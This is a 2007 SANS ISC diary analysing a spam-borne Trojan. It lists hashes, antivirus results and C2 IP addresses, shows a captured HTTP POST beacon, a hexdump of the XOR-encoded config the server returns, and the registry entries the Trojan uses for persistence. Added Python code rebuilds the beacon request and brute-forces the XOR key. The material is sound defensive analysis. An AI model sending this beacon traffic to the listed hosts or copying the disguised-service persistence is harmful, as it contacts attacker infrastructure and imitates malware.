SANS ISC: InfoSec Handlers Diary Blog - New Malware SPAM

New Malware SPAM

Published: 2007-06-04
Last Updated: 2007-06-06 22:52:18 UTC
by Robert Danford (Version: 3)
One of our readers (thanks Michael S.) reported receiving a password protected zip file as SPAM with the password included in the HTML body of the email.

The SPAM From: line may show a news organization. However, the actual sources of the email are all over the map (numerous broadband IPs on several continents). Hopefully most people have been trained by now not to trust the From: line or to reply to spammy-looking emails.

Sample Subject Lines:
Subject: Re: U.S. violent crime up again, more murders, robberies
Subject: Man Awakens From 19-Year Coma
Subject: Law hits Las Vegas 'fake' bands

Several of the samples included body text such as:

Decade Of Mystery: John Ramsey Speaks
Man wakes from 19-year coma in
Poland US vows to pursue hunt for missing soldiers
Password for submitted attachment is xxx

Attachments include names such as "<news organization>-news<digits>.zip"

At the moment AV coverage (of the uncompressed file) is spotty.

File size: 40960 bytes
MD5: efff306b3296b18a94fea8491b960ab0
SHA1: 11afce9edf86386f0383bd162cff428a7fdf27bd
packers: UPX
Engine | Version | Updated | Result
AhnLab-V3 | 2007.5.31.2 | 06.04.2007 | no virus found
AntiVir | 7.4.0.29 | 06.04.2007 | no virus found
Authentium | 4.93.8 | 05.23.2007 | no virus found
Avast | 4.7.997.0 | 06.04.2007 | Win32:Agent-GPS
AVG | 7.5.0.467 | 06.03.2007 | no virus found
BitDefender | 7.2 | 06.04.2007 | no virus found
CAT-QuickHeal | 9.00 | 06.04.2007 | no virus found
ClamAV | devel-20070416 | 06.04.2007 | no virus found
DrWeb | 4.33 | 06.04.2007 | no virus found
eSafe | 7.0.15.0 | 06.04.2007 | suspicious Trojan/Worm
eTrust-Vet | 30.7.3690 | 06.04.2007 | no virus found
Ewido | 4.0 | 06.04.2007 | no virus found
FileAdvisor | 1 | 06.04.2007 | no virus found
Fortinet | 2.85.0.0 | 06.02.2007 | suspicious
F-Prot | 4.3.2.48 | 06.04.2007 | no virus found
F-Secure | 6.70.13030.0 | 06.04.2007 | no virus found
Ikarus | T3.1.1.8 | 06.04.2007 | no virus found
Kaspersky | 4.0.2.24 | 06.04.2007 | no virus found
McAfee | 5045 | 06.04.2007 | no virus found
Microsoft | 1.2503 | 06.04.2007 | no virus found
NOD32v2 | 2307 | 06.04.2007 | no virus found
Norman | 5.80.02 | 06.04.2007 | no virus found
Panda | 9.0.0.4 | 06.04.2007 | no virus found


The binary, once executed, appears to call home via an HTTP POST to at least one of two web servers:

216.40.204.106
ev1s-216-40-204-106.ev1servers.net
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
13749 | 216.40.204.106 | 216.40.192.0/20 | US | arin | 2000-10-05 | EVERYONES-INTERNET - Everyones Internet

74.52.72.58
3a.48.344a.static.theplanet.com
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
21844 | 74.52.72.58 | 74.52.0.0/16 | US | arin | 2006-02-17 | THEPLANET-AS - THE PLANET

Here are the partially sanitized details from one such call home:

POST /forum.php HTTP/1.1
Host: 216.40.204.106:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: */*
Accept-Language: en
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=4AFEAB473A5F7
Content-Length: 587

--4AFEAB473A5F7
Content-Disposition: form-data; name="sid"
1731421623279576
--4AFEAB473A5F7
Content-Disposition: form-data; name="up"
415735
--4AFEAB473A5F7
Content-Disposition: form-data; name="wbfl"
1
--4AFEAB473A5F7
Content-Disposition: form-data; name="v"
243
--4AFEAB473A5F7
Content-Disposition: form-data; name="ping"
768
--4AFEAB473A5F7
Content-Disposition: form-data; name="guid"
{BDDC89D0-27C5-449C-AD5C-6FCF1C875D65}
--4AFEAB473A5F7
Content-Disposition: form-data; name="wv"
5#2#2#0#2600#0
--4AFEAB473A5F7--
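The request above is easier to work with (for a detection rule, or for pulling the guid and version fields out of a capture) once it is parsed as multipart/form-data. The following is an added example, not code from the diary or from the malware: it rebuilds the captured request with CRLF framing (which the diary's text rendering lost), parses the boundary and the seven form fields back out, and flags the field set that every observed call-home shared. Content-Length is computed from the rebuilt body rather than copied, since the sanitized capture's exact framing cannot be reproduced.

```python
"""Parse the multipart/form-data call-home request shown in the diary.

Added example, not from the diary or the malware. The request bytes are
reconstructed from the capture; Content-Length is computed, not copied."""
import re

# Boundary and field values constructed from the capture above.
BOUNDARY = b"4AFEAB473A5F7"
CAPTURED_FIELDS = [
    (b"sid", b"1731421623279576"),
    (b"up", b"415735"),
    (b"wbfl", b"1"),
    (b"v", b"243"),
    (b"ping", b"768"),
    (b"guid", b"{BDDC89D0-27C5-449C-AD5C-6FCF1C875D65}"),
    (b"wv", b"5#2#2#0#2600#0"),
]
# Field names present in the observed POSTs: the shape a detection keys on.
BEACON_FIELDS = {"sid", "up", "wbfl", "v", "ping", "guid", "wv"}


def build_body(boundary, fields):
    """Frame name/value pairs as the client did: CRLF, one part per field."""
    parts = []
    for name, value in fields:
        parts.append(b"".join([
            b"--", boundary, b"\r\n",
            b'Content-Disposition: form-data; name="', name, b'"\r\n\r\n',
            value, b"\r\n",
        ]))
    return b"".join(parts) + b"--" + boundary + b"--\r\n"


def build_request(body, boundary=BOUNDARY):
    """Request line and headers from the capture on top of the body."""
    head = [
        b"POST /forum.php HTTP/1.1",
        b"Host: 216.40.204.106:80",
        b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
        b"Accept: */*",
        b"Accept-Language: en",
        b"Accept-Encoding: deflate",
        b"Cache-Control: no-cache",
        b"Content-Type: multipart/form-data; boundary=" + boundary,
        b"Content-Length: " + str(len(body)).encode(),   # computed, see lead-in
    ]
    return b"\r\n".join(head) + b"\r\n\r\n" + body


def parse_multipart(body, boundary):
    """Minimal multipart/form-data parser returning {field name: value}."""
    fields = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):          # closing "--boundary--"
            break
        part_headers, _, value = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'; name="([^"]*)"', part_headers)   # not filename=
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n").decode(errors="replace")
    return fields


def parse_request(raw):
    """Split a raw HTTP request into (request line, headers, form fields)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().lower().decode()] = v.strip().decode()
    m = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    fields = parse_multipart(body, m.group(1).encode()) if m else {}
    return lines[0].decode(), headers, fields


def looks_like_beacon(fields):
    """True when the field set matches the observed call-home and guid is a braced GUID."""
    guid = fields.get("guid", "")
    return set(fields) == BEACON_FIELDS and re.fullmatch(r"\{[0-9A-Fa-f-]{36}\}", guid) is not None


def captured_request():
    """The reconstructed capture, parsed."""
    return parse_request(build_request(build_body(BOUNDARY, CAPTURED_FIELDS)))


if __name__ == "__main__":
    request_line, headers, fields = captured_request()
    print(request_line, "Content-Length:", headers["content-length"])
    for name, value in fields.items():
        print(f"{name:>5} = {value}")
    print("beacon shape:", looks_like_beacon(fields))
```

`looks_like_beacon()` matches on the set of field names plus the guid format rather than on any one value, because sid, up and ping vary per host and per poll while the field layout is what stays constant across the observed POSTs.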

In response to this POST the webserver returns a binary file:

HTTP/1.1 200 OK
Date: Mon, 04 Jun 2007 17:22:01 GMT
Server: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e mod_autoindex_color PHP/5.2.1
X-Powered-By: PHP/5.2.1
Content-Length: 260
Connection: close
Content-Type: multipart/form-data; boundary="4AFEAB473A5F7"

--4AFEAB473A5F7
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
0d0a 2768 727f 252d 2e2d 2a2e 2928 2c2a ..'hr.%-.-*.)(,*
2a22 2b28 292d 2a27 3468 727f 2511 2779 *"+()-*'4hr.%.'y
7774 7870 2511 276d 2511 292f 2b11 2734 wtxp%.'m%.)/+.'4
6d25 1127 6825 112c 2f35 2e29 352c 2935 m%.'h%.,/5.)5,)5
2e23 2123 2b16 1129 2a2d 352f 2b35 292b .#!#+..)*-5/+5)+
2f35 2a2b 2d21 232b 1127 3468 2511 2734 /5*+-!#+.'4h%.'4
7977 7478 7025 ywtxp%
--4AFEAB473A5F7--

I have included the hexdump of COMMON.BIN unsanitized above for anyone wanting to take it apart (and please submit your analysis to our contact page if you would).
Possibly an encoded config file.

Here are the system modification details:
Creates file C:\WINDOWS\ws386.ini.
Creates file C:\WINDOWS\s32.txt.
Creates key "HKLM\System\CurrentControlSet\Services\aspimgr".
Sets value "ImagePath"="C:\WINDOWS\SYSTEM\aspimgr.exe" in key "HKLM\System\CurrentControlSet\Services\aspimgr".
Sets value "DisplayName"="Microsoft ASPI Manager" in key "HKLM\System\CurrentControlSet\Services\aspimgr".
Creates key "HKLM\Software\Microsoft\Sft".
Sets value "default"="{00000000-0000-0000-0000-00003F000F00}" in key "HKLM\Software\Microsoft\Sft".

In addition to the readers who submitted information, I'd also like to thank Anubis, Norman, and Sunbelt for their excellent analysis results.

Update 1:
We had two readers (Rich and a 2nd submitter) send in the decoded values for COMMON.BIN. Rich found the answer first by noticing a number of repeated characters and trying to XOR each byte with all values between 0 and 255 in turn. Once he hit 27 (hex 0x1B) the text was revealed.

<sid>1731421623279576</sid>
<block>
<v>
240
</v>
<s>
74.52.72.58:80
216.40.204.106:80
</s>
</block>


(The submitters will note the SID was altered to match the POST data above, as the real values themselves match)

The IP:PORT pairs listed in the <s> section were those observed as destinations for the POST call-homes.
No passive-DNS replication data has been observed for either IP to date, so the sample is simply hard-coding them.
<v> may be a version number, but it does not match what the client sent.
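Rich's approach generalizes: a single-byte XOR key leaves only 256 candidates, so the decoder can try them all and keep only the ones that produce text. The following is an added example, not code from the diary or from either submitter: it parses the hexdump of COMMON.BIN printed above, brute-forces the key, and pulls the sid and the server list back out of the decoded XML. It goes beyond the single key reported here in that the ranking works for any file of this kind; the plausibility score (reject non-text bytes, then reward lowercase letters, digits and newlines and penalise uppercase-heavy output) is my own heuristic, not anything from the diary. One assumption is built in: the leading 0d0a in the hexdump is read as the blank line that ends the part headers, not as part of the file, so it is dropped before decoding. Because the hexdump is the unsanitized one, the sid it yields differs from the altered value shown in the diary's decoded listing.

```python
"""Recover the XOR-encoded COMMON.BIN from the diary's hexdump.

Added example, not the diary's or the submitters' code. Tries all 256
single-byte keys, discards any that yield non-text bytes, ranks the rest
with a heuristic score and parses the winning plaintext."""
import re

# Hexdump copied from the diary (hex columns followed by an ASCII gutter).
HEXDUMP = """\
0d0a 2768 727f 252d 2e2d 2a2e 2928 2c2a ..'hr.%-.-*.)(,*
2a22 2b28 292d 2a27 3468 727f 2511 2779 *"+()-*'4hr.%.'y
7774 7870 2511 276d 2511 292f 2b11 2734 wtxp%.'m%.)/+.'4
6d25 1127 6825 112c 2f35 2e29 352c 2935 m%.'h%.,/5.)5,)5
2e23 2123 2b16 1129 2a2d 352f 2b35 292b .#!#+..)*-5/+5)+
2f35 2a2b 2d21 232b 1127 3468 2511 2734 /5*+-!#+.'4h%.'4
7977 7478 7025 ywtxp%
"""

# Printable ASCII plus tab, CR and LF: anything else means "not text".
TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def parse_hexdump(dump):
    """Read the hex tokens of each line and stop at the first non-hex token (the gutter)."""
    out = bytearray()
    for line in dump.splitlines():
        for token in line.split():
            if re.fullmatch(r"[0-9a-fA-F]{2}|[0-9a-fA-F]{4}", token):
                out += bytes.fromhex(token)
            else:
                break
    return bytes(out)


def xor_bytes(buf, key):
    return bytes(b ^ key for b in buf)


def plausibility(buf):
    """Heuristic text score: -1 if any byte is outside TEXT_BYTES, otherwise
    +1 per lowercase letter, digit or space, +3 per newline (config files are
    line-oriented) and -3 per uppercase letter (real text is mostly lowercase)."""
    if any(b not in TEXT_BYTES for b in buf):
        return -1
    score = 0
    for b in buf:
        c = chr(b)
        if c.islower() or c.isdigit() or c == " ":
            score += 1
        elif c == "\n":
            score += 3
        elif c.isupper():
            score -= 3
    return score


def rank_keys(buf):
    """All single-byte keys whose output passes the text filter, best score first."""
    scored = [(plausibility(xor_bytes(buf, k)), k) for k in range(256)]
    return sorted(((s, k) for s, k in scored if s >= 0), reverse=True)


def recover_config(dump=HEXDUMP):
    """Decode with the best-ranked key and extract the sid and the server list."""
    raw = parse_hexdump(dump)
    if raw.startswith(b"\r\n"):      # assumed: blank line ending the part headers
        raw = raw[2:]
    score, key = rank_keys(raw)[0]
    text = xor_bytes(raw, key).decode("ascii")
    sid = re.search(r"<sid>(\d+)</sid>", text)
    servers = re.search(r"<s>(.*?)</s>", text, re.S)
    return {
        "key": key,
        "score": score,
        "text": text,
        "sid": sid.group(1) if sid else None,
        "servers": servers.group(1).split() if servers else [],
    }


if __name__ == "__main__":
    result = recover_config()
    print(f"key 0x{result['key']:02X} (score {result['score']})")
    print(result["text"])
    print("sid:", result["sid"], "servers:", result["servers"])
```

Run as a script it prints the key, the decoded XML and the parsed fields. The printability filter alone leaves several candidate keys for a file this small, which is why a scoring step (or, as Rich did, a look at each candidate) is still needed; `rank_keys()` returns the full ranked list so the runner-up candidates can be inspected too.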